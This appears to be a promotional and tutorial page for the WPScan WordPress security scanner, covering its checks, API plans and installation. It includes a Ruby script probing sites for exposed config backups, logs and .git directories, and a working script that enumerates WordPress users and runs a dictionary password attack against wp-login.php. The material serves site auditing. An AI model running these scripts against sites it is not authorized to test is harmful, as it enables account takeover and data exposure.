WPScan is a WordPress security plugin that checks your website for known vulnerabilities against the vulnerability database its team maintains.
That database currently holds more than 21,000 entries and has been receiving new vulnerabilities since 2014. With WPScan installed you no longer need to check your site for known issues by hand.
The plugin identifies the most significant vulnerabilities affecting your site. Beyond that, WPScan also checks for exposed debug logs, weak passwords, leftover backup files and more.
These are just a few of the features you get with WPScan:
- Automatically checks WordPress core, plugins and themes for known vulnerabilities
- Vulnerability database updated as new WordPress security issues are published
- Additional security checks that need no API token
- Notifications via email
Free Download WPScan v.1.15.5 Latest Version
WPScan offers a free API plan that should suit the majority of WordPress websites; paid plans are available for users who need more API access. To use the WPScan WordPress Security Plugin you need an API token, which you can obtain for free by signing up here.
The Free plan permits up to 25 API calls per calendar day. Check the available API plans if you need a higher limit.
How many API requests do you need?
- The scanner sends one API request for the WordPress core version, one per installed plugin and one per installed theme.
- An average WordPress website has 22 installed plugins.
- The Free plan should therefore cover about 50 percent of all WordPress websites (a site with 22 plugins and one theme needs 24 requests, just inside the daily limit).
The WPScan WordPress Security Plugin also looks for other security problems that require no API token, for example:
- debug.log files left in the web root
- wp-config.php backup files
- whether XML-RPC is enabled
- exposed code repositories
- whether the default secret keys are still in use
- exported database files
- weak passwords
- whether HTTPS is enabled
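The token-free checks listed above are all things a plain HTTP client can test from the outside. The script below is an added example written for this page, not WPScan's own code: it probes a site root for a debug log, wp-config.php backups, database exports, an exposed .git directory and XML-RPC, looks for the sample-file secret-key placeholder inside any config backup it finds, and flags a non-HTTPS base URL. The candidate file names, the host example.test and the sample responses are assumptions constructed for the example.

```ruby
# Added example: token-free exposure checks of the kind listed above, as a
# stand-alone Ruby script (not WPScan's own code).
require 'net/http'
require 'uri'

# Placeholder that ships in WordPress's wp-config-sample.php; a config still
# carrying it has never had its secret keys and salts set.
DEFAULT_SECRET = 'put your unique phrase here'.freeze

# One entry per check: candidate paths under the site root (the file names
# are assumptions about what gets left behind, not WPScan's own list) and a
# matcher deciding from status code and body whether the path is a real hit.
CHECKS = [
  { name: 'debug.log exposed', paths: ['wp-content/debug.log'],
    hit: ->(code, body) { code == 200 && body.match?(/PHP (Notice|Warning|Fatal|Deprecated)/) } },
  { name: 'wp-config.php backup exposed',
    paths: ['wp-config.php.bak', 'wp-config.php~', 'wp-config.php.old', 'wp-config.php.save'],
    hit: ->(code, body) { code == 200 && body.include?('DB_PASSWORD') } },
  { name: 'database export exposed', paths: ['backup.sql', 'database.sql', 'dump.sql'],
    hit: ->(code, body) { code == 200 && body.match?(/CREATE TABLE|INSERT INTO/) } },
  { name: 'code repository exposed', paths: ['.git/HEAD'],
    hit: ->(code, body) { code == 200 && body.start_with?('ref:') } },
  # WordPress answers a GET to xmlrpc.php with 405 and this exact sentence.
  { name: 'XML-RPC enabled', paths: ['xmlrpc.php'],
    hit: ->(_code, body) { body.include?('XML-RPC server accepts POST requests only') } }
].freeze

# Real fetcher: GET base + path, returning [status, body]. A network error
# counts as a miss rather than aborting the whole audit.
def http_fetch(base)
  root = base.end_with?('/') ? base : "#{base}/"
  lambda do |path|
    begin
      res = Net::HTTP.get_response(URI.join(root, path))
      [res.code.to_i, res.body.to_s]
    rescue StandardError
      [0, '']
    end
  end
end

# Run every check against one site; returns an array of {check:, path:} findings.
def audit(base, fetch: http_fetch(base))
  findings = []
  findings << { check: 'HTTPS not enabled', path: base } unless base.start_with?('https://')
  CHECKS.each do |check|
    check[:paths].each do |path|
      code, body = fetch.call(path)
      next unless check[:hit].call(code, body)
      findings << { check: check[:name], path: path }
      # A served config backup is the one place a remote scan can see the salts.
      if check[:name].start_with?('wp-config') && body.include?(DEFAULT_SECRET)
        findings << { check: 'default secret keys in use', path: path }
      end
    end
  end
  findings
end

# Constructed sample responses standing in for a misconfigured site so the
# script runs offline; anything not listed here answers 404.
SAMPLE_SITE = {
  'wp-content/debug.log' => [200, "[01-Jan-2024 10:00:00 UTC] PHP Notice:  Undefined index: id in /var/www/html/wp-content/plugins/foo/foo.php on line 3\n"],
  'wp-config.php.bak'    => [200, "<?php\ndefine('DB_PASSWORD', 'hunter2');\ndefine('AUTH_KEY', 'put your unique phrase here');\n"],
  '.git/HEAD'            => [200, "ref: refs/heads/main\n"],
  'xmlrpc.php'           => [405, 'XML-RPC server accepts POST requests only.']
}.freeze
SAMPLE_FETCH = ->(path) { SAMPLE_SITE.fetch(path, [404, 'Not Found']) }

# Usage: ruby wp_exposure_check.rb https://your-site.example/
# With no argument the constructed sample site is audited instead.
base = ARGV.first || 'http://example.test/'
fetch = ARGV.first ? http_fetch(base) : SAMPLE_FETCH
audit(base, fetch: fetch).each { |f| puts "[!] #{f[:check]} (#{f[:path]})" }
```

Each matcher looks at the response body, not just the status code, because many hosts answer unknown paths with a 200 "soft 404" page; a debug.log that contains no PHP notices or a .git/HEAD that is really an HTML error page is not reported. Against the constructed sample site the script reports six findings: no HTTPS, the debug log, the config backup, default secret keys (found inside that backup), the Git repository and XML-RPC.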
What does the plugin do?
- Scans for known vulnerabilities in WordPress core, plugins and themes;
- Runs additional security checks;
- Shows an icon in the Admin Toolbar with the number of security issues found;
- Notifies you via email whenever new vulnerabilities are discovered.
WPScan WordPress security scanner features
WordPress enumeration scans
Enumeration attacks are attempts by an attacker to determine or confirm that something exists on the target system. WordPress user enumeration, for example, is a method by which an attacker works out which user accounts exist on a particular website. On its own this may not be a significant security issue, but an attacker can combine that information with other weaknesses to carry out a larger attack.
WPScan is a black-box scanner: it has no access to the site's source code. Instead it uses the same enumeration methods a real attacker would use to discover details about a WordPress target. Some of the most common enumeration scans WPScan performs are:
- Determining the version of WordPress core, plugins and themes;
- Checking for publicly accessible wp-config.php backups and database exports;
- Enumerating WordPress users.
WordPress username enumeration and weak password cracking (aka brute-force attacks)
As mentioned above, WPScan can enumerate WordPress users. It can also go one step further and attempt to crack weak passwords for those users.
This is a good way to check your own WordPress website for weak credentials. WPScan cracks passwords using a password dictionary of your choice; we will use part of the rockyou.txt dictionary in the following example.
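To make the two steps described in the enumeration section and in this one concrete, here is an added example (written for this page, not WPScan's code) that enumerates usernames through the two classic black-box channels, the /?author=N redirect and the wp-json/wp/v2/users REST endpoint, and then tries a short password list against wp-login.php for each account, run only against a site you are authorized to test. The FakeSite class, its two users, the host example.test and the five-word list standing in for a rockyou.txt slice are constructed for the example; the HTTP transport uses only the standard library.

```ruby
# Added example (not WPScan's code): user enumeration followed by a dictionary
# check of each account's password, against a site you are authorized to test.
require 'net/http'
require 'uri'
require 'json'

# A "site" is anything answering get(path) and post(path, form), each returning
# [status, headers, body] with header values as arrays (the shape that
# Net::HTTPResponse#to_hash gives). HttpSite talks to a real host; FakeSite
# further down is a constructed stand-in so the example runs offline.
class HttpSite
  def initialize(base)
    @root = base.end_with?('/') ? base : "#{base}/"
  end
  def get(path) # get_response does not follow redirects, which is what we want
    res = Net::HTTP.get_response(URI.join(@root, path))
    [res.code.to_i, res.to_hash, res.body.to_s]
  end
  def post(path, form)
    res = Net::HTTP.post_form(URI.join(@root, path), form)
    [res.code.to_i, res.to_hash, res.body.to_s]
  end
end

# Two tricks a black-box scanner uses: /?author=N redirects to /author/<nicename>/
# when that author id exists, and wp-json/wp/v2/users lists users with content.
def enumerate_users(site, max_author_id: 10)
  users = []
  (1..max_author_id).each do |id|
    status, headers, _body = site.get("?author=#{id}")
    location = Array(headers['location']).first.to_s
    users << Regexp.last_match(1) if [301, 302].include?(status) && location =~ %r{/author/([^/?#]+)}
  end
  status, _headers, body = site.get('wp-json/wp/v2/users')
  if status == 200
    list = JSON.parse(body) rescue [] # endpoint blocked or rewritten: nothing to add
    list.each { |u| users << u['slug'] if u.is_a?(Hash) && u['slug'] }
  end
  users.uniq.sort
end

# Try each dictionary word against wp-login.php. WordPress answers a correct
# login with a wordpress_logged_in_* cookie plus a redirect; a wrong one
# re-renders the form with a login_error box. Returns the hit or nil.
def check_weak_password(site, user, wordlist)
  wordlist.each do |pwd|
    _status, headers, _body = site.post('wp-login.php',
                                        'log' => user, 'pwd' => pwd,
                                        'wp-submit' => 'Log In', 'testcookie' => '1')
    return pwd if Array(headers['set-cookie']).join(' ').include?('wordpress_logged_in_')
  end
  nil
end

# Constructed target: two users, one of them with a dictionary password.
class FakeSite
  USERS = { 1 => 'admin', 2 => 'editor' }.freeze
  PASSWORDS = { 'admin' => 'Password1', 'editor' => 'c0rrect-h0rse-battery' }.freeze
  def get(path)
    if path =~ /\A\?author=(\d+)\z/ && USERS[$1.to_i]
      [302, { 'location' => ["https://example.test/author/#{USERS[$1.to_i]}/"] }, '']
    elsif path == 'wp-json/wp/v2/users'
      body = USERS.map { |id, slug| { 'id' => id, 'slug' => slug, 'name' => slug.capitalize } }
      [200, { 'content-type' => ['application/json'] }, JSON.generate(body)]
    else
      [404, {}, 'Not Found']
    end
  end
  def post(path, form)
    if path == 'wp-login.php' && PASSWORDS[form['log']] == form['pwd']
      [302, { 'set-cookie' => ['wordpress_logged_in_0123abcd=admin%7C1700000000; Path=/; HttpOnly'],
              'location' => ['https://example.test/wp-admin/'] }, '']
    else
      [200, {}, '<div id="login_error">Error: The password you entered is incorrect.</div>']
    end
  end
end

# Usage: ruby wp_weak_creds.rb https://your-site.example/ rockyou.txt
# Without arguments the constructed FakeSite and a five-word list are used.
if ARGV.first
  site = HttpSite.new(ARGV.first)
  wordlist = File.readlines(ARGV[1] || 'rockyou.txt', chomp: true)
else
  site = FakeSite.new
  wordlist = %w[123456 password qwerty Password1 letmein] # stand-in for a rockyou.txt slice
end
users = enumerate_users(site)
puts "users: #{users.join(', ')}"
users.each do |u|
  hit = check_weak_password(site, u, wordlist)
  puts(hit ? "[!] #{u}: weak password '#{hit}'" : "[ok] #{u}: no dictionary hit")
end
```

Success is judged on the Set-Cookie header rather than on the response body: a logged-in session always gets a wordpress_logged_in_ cookie, while the text of the error box changes between WordPress versions and translations. Against the constructed site the run reports admin with the weak password Password1 and no hit for editor.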
WPScan not only identifies the versions of the plugins and themes running on a WordPress site, it also checks those versions against the large wpvulndb.com WordPress vulnerability database.
WPScan will also tell you whether the WordPress version you are running has known security weaknesses; if it does, update to the latest WordPress release.
Let's install WPScan
It's fairly simple.
WPScan runs on Linux and Mac. Windows users can run it inside a VMware virtual machine.
Here are the command-line steps to get it up and running:
WPScan is hosted on GitHub, so you need Git first.
- Debian/Ubuntu command (on a Mac, install Git with Homebrew: brew install git):
sudo apt-get install git
- Fedora command:
$ yum install git
- ArchLinux command:
$ pacman -S git
Install Linux dependencies
On Linux you also need build dependencies, which vary by distribution.
- Ubuntu 14.04+ command:
sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential
- Ubuntu before 14.04 command:
sudo apt-get install libcurl4-openssl-dev libxml2-dev ruby-dev
- Debian command:
sudo apt-get install git ruby-dev libcurl4-openssl-dev make
- Fedora command:
sudo yum install gcc ruby-devel libxml2 libxml2-devel libxslt libxslt-devel libcurl-devel patch
- ArchLinux command:
pacman -Syu ruby
Now clone WPScan with the following command:
git clone https://github.com/wpscanteam/wpscan.git
Then move into the directory it was cloned to:
cd wpscan
Install Bundler
WPScan is written in Ruby, so it needs Ruby gems. From inside the wpscan directory, install Bundler and then the gems WPScan depends on (the test group is not needed to run scans):
sudo gem install bundler && sudo bundle install --without test
If you prefer not to install the gems system-wide, keep them inside the checkout instead:
bundle install --without test --path vendor/bundle
ArchLinux users also need these two gems:
gem install typhoeus
gem install nokogiri
Be patient: these installs can take up to ten minutes. After that you are (almost) ready to scan.
Always keep WPScan updated
Before running any scan, update WPScan so that your site is checked against the most current vulnerability data. With out-of-date data you could miss exactly the vulnerabilities attackers are looking to exploit. To update WPScan, open a terminal in the wpscan directory and run:
ruby wpscan.rb --update
When you see the WPScan logo, you know you are on the right track.